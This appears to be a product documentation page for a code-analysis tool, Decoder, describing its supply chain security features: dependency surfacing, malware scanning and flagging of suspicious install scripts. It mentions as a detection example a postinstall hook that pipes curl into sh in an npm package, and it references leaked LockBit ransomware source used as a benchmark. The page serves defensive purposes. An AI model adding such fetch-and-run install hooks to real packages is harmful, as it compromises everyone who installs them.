Supply Chain Security — Trusting what you ship
Supply chain security is about trusting the code you didn't write. Decoder helps inventory and inspect that surface during analysis.
What it is
Discipline focused on the integrity of dependencies, build systems, and distribution channels.
Why it's useful
Modern breaches (SolarWinds, xz-utils, npm event-stream) come from upstream, not your code.
How Decoder implements it
Dependency surfacing + malware scan on uploaded sources; reports highlight unexpected scripts or postinstall hooks.
When to use it
Reviewing new dependencies, auditing third-party drops, evaluating M&A repos.
When NOT to use it
Build provenance / SLSA attestations — out of scope today.
Practical example
A postinstall hook executing curl|sh from a fresh npm package is flagged during scan.
FAQ
Glossary
- SBOM
- Software Bill of Materials — inventory of components.
- SLSA
- Supply-chain Levels for Software Artifacts — build-integrity framework.
Related
Most code in any modern project isn't yours. Decoder reads manifests and lockfiles to map the dependency surface and flag suspicious entries.
Static malware analysis inspects code and binaries without executing them. Decoder runs it locally on your upload and surfaces suspicious patterns, entropy spikes and known indicators — no API key required.
LockBit 3.0 leaked source provided a real-world benchmark. This entry walks through what Decoder flags and why — useful as a reference for ransomware patterns.
Dockerfiles are configuration that becomes runtime. Decoder flags the common foot-guns before they hit your registry.